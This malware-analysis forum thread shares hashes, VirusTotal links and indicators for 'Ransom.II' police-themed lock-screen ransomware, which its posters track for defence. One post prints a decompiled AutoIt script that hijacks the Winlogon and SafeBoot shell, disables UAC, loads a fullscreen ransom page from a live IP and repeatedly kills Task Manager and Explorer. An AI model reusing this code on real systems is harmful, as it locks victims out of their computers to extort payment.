AutoIt/LockScreen

Forum for analysis and discussion about malware.
User avatar
thisisu
Posts: 362
Joined: Sun Feb 26, 2012 8:57 am
Contact:

AutoIt/LockScreen

Post by thisisu » Mon Jun 04, 2012 8:06 am

Celas
MD5: a7768f4973ad7cf8217212a4d12dbae0
https://www.virustotal.com/file/c8ea293 ... /analysis/

Image
You do not have the required permissions to view the files attached to this post.

Kafeine
Posts: 105
Joined: Thu Jul 28, 2011 1:19 pm

Re: Trojan Ransom / FakePoliceAlert

Post by Kafeine » Mon Jun 04, 2012 8:22 am

thisisu wrote:Celas
Here on botnets.fr :
https://www.botnets.fr/index.php/Ransom.II

User avatar
thisisu
Posts: 362
Joined: Sun Feb 26, 2012 8:57 am
Contact:

Re: Trojan Ransom / FakePoliceAlert

Post by thisisu » Mon Jun 11, 2012 12:32 am

"Celas" - Ransom.II
MD5: 941d0697b844414be106b7a397d31fd6
https://www.virustotal.com/file/8801cce ... /analysis/
You do not have the required permissions to view the files attached to this post.

User avatar
tachion
Posts: 32
Joined: Sat Dec 24, 2011 10:03 am

Re: Trojan Ransom / FakePoliceAlert

Post by tachion » Mon Jun 11, 2012 5:16 pm

Next Ransom II - Celas :)
You do not have the required permissions to view the files attached to this post.

Win32:Virut
Posts: 324
Joined: Sat Jun 02, 2012 2:22 pm

Re: Trojan Ransom / FakePoliceAlert

Post by Win32:Virut » Tue Jun 12, 2012 1:41 pm

"Celas" - Ransom.II

6ff98578a6948960677ea1317b7f69db https://www.virustotal.com/file/2d99e84 ... /analysis/
6177f9bde1fd578165974ceddcade3d9 https://www.virustotal.com/file/1cfb58f ... /analysis/
You do not have the required permissions to view the files attached to this post.

Win32:Virut
Posts: 324
Joined: Sat Jun 02, 2012 2:22 pm

Trojan:AutoIt/LockScreen

Post by Win32:Virut » Sun Jul 08, 2012 7:52 pm

Ransom.II

MD5: F74E910C368717E9ACEF3A1B9A1A9F03

Screenshots: https://www.botnets.fr/index.php/Ransom.II
You do not have the required permissions to view the files attached to this post.

Win32:Virut
Posts: 324
Joined: Sat Jun 02, 2012 2:22 pm

Re: Trojan Ransom / FakePoliceAlert

Post by Win32:Virut » Mon Jul 09, 2012 1:50 pm

Trojan:Win32/Ransom.II

MD5: 5D18E789AFED967531372ACCBB7152A2
You do not have the required permissions to view the files attached to this post.

Win32:Virut
Posts: 324
Joined: Sat Jun 02, 2012 2:22 pm

Re: Trojan Ransom / FakePoliceAlert

Post by Win32:Virut » Fri Aug 17, 2012 1:36 pm

Ransom.II

MD5: 82B192B07B32D0E77B1F2B21F17283E6

https://www.virustotal.com/file/edd206f ... /analysis/
You do not have the required permissions to view the files attached to this post.

User avatar
thisisu
Posts: 362
Joined: Sun Feb 26, 2012 8:57 am
Contact:

Re: Trojan Ransom / FakePoliceAlert

Post by thisisu » Tue Nov 13, 2012 1:02 am

Win32:Virut wrote:Ransom.II

MD5: F74E910C368717E9ACEF3A1B9A1A9F03

Screenshots: https://www.botnets.fr/index.php/Ransom.II
Parts of decompiled Autoit script. / Highlights?

Code: Select all

00049AAC -> CompiledPathName: C:\DOKUME~1\Admin\LOKALE~1\Temp\aut3E.tmp

$UNDERGROUND = "brasilia"
$SWISS = "germany"

ProcessClose("iexplore.exe")
ProcessClose("firefox.exe")
$URL = "95.163.104.88/spielberg/start.php"
If @OSVersion = "WIN_7" Or @OSVersion = "WIN_VISTA" Then
	If @OSArch = "X64" Then
		RegWrite("HKEY_LOCAL_MACHINE64\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", @ScriptFullPath)
	Else
		RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", @ScriptFullPath)
	EndIf
EndIf
$ASHELL = RegRead("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot", "AlternateShell")
If $ASHELL <> @ScriptFullPath Then
	If @OSVersion <> "WIN_7" Or @OSVersion = "WIN_VISTA" Then
		RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", @ScriptFullPath)
	EndIf
	RegWrite("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot", "AlternateShell", "REG_SZ", @ScriptFullPath)
	RegWrite("HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Restrictions", "NoBrowserContextMenu", "REG_DWORD", "1")
	RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoViewContextMenu", "REG_DWORD", "1")
	RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA", "REG_DWORD", "0")
EndIf
$SHELL = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell")
If $SHELL <> @ScriptFullPath Then
	FileCreateShortcut(@ScriptFullPath, @StartupDir & "\" & @ScriptName & ".lnk")
EndIf
$OIE = ObjCreate("Shell.Explorer.2")
$HGUI = GUICreate("", @DesktopWidth, @DesktopHeight, 0, 0, $WS_POPUP + $WS_EX_TOOLWINDOW, $WS_EX_LAYERED + $WS_EX_TOPMOST + $WS_EX_TOOLWINDOW)
$GUIACTIVEX = GUICtrlCreateObj($OIE, 0, 0, @DesktopWidth, @DesktopHeight)
GUISetBkColor(1, $HGUI)
GUISetState()
$OIE.navigate($URL)
_WinAPI_SetLayeredWindowAttributes($HGUI, 1, 255, 3)
Local $TIMER, $DIFF
$TIMER = TimerInit()
While 1
	$DIFF = TimerDiff($TIMER)
	If $DIFF > 150 Then
		If ProcessExists("taskmgr.exe") Then
			ProcessClose("taskmgr.exe")
		EndIf
		If ProcessExists("explorer.exe") Then
			Run(@ComSpec & " /c " & "taskkill /f /im explorer.exe", "", @SW_HIDE)
		EndIf
		$DIFF = 0
		$TIMER = TimerInit()
	EndIf
	WinSetOnTop($HGUI, "", 1)
	WinActivate($HGUI)
WEnd
Full decompile in attachment.

You can add this IP: 95.163.104.88 to your page Kafeine :)
You do not have the required permissions to view the files attached to this post.

User avatar
thisisu
Posts: 362
Joined: Sun Feb 26, 2012 8:57 am
Contact:

Re: Trojan Ransom / FakePoliceAlert

Post by thisisu » Tue Nov 13, 2012 1:35 am

Win32:Virut wrote:Ransom.II

MD5: 82B192B07B32D0E77B1F2B21F17283E6

https://www.virustotal.com/file/edd206f ... /analysis/
Lots of interesting code in this one IMO. I just picked a small amount so it doesn't lag the thread.

Code: Select all

00049AAC -> CompiledPathName: C:\DOKUME~1\Admin\LOKALE~1\Temp\aut7B.tmp

If FileExists(@AppDataDir & "1.exe") Then
	$HAFTBEFEHLAAT = "haftbefehlaat"
	$URL = "95.163.104.87/aff14/start.php"
Full decompile in attach
You do not have the required permissions to view the files attached to this post.

Post Reply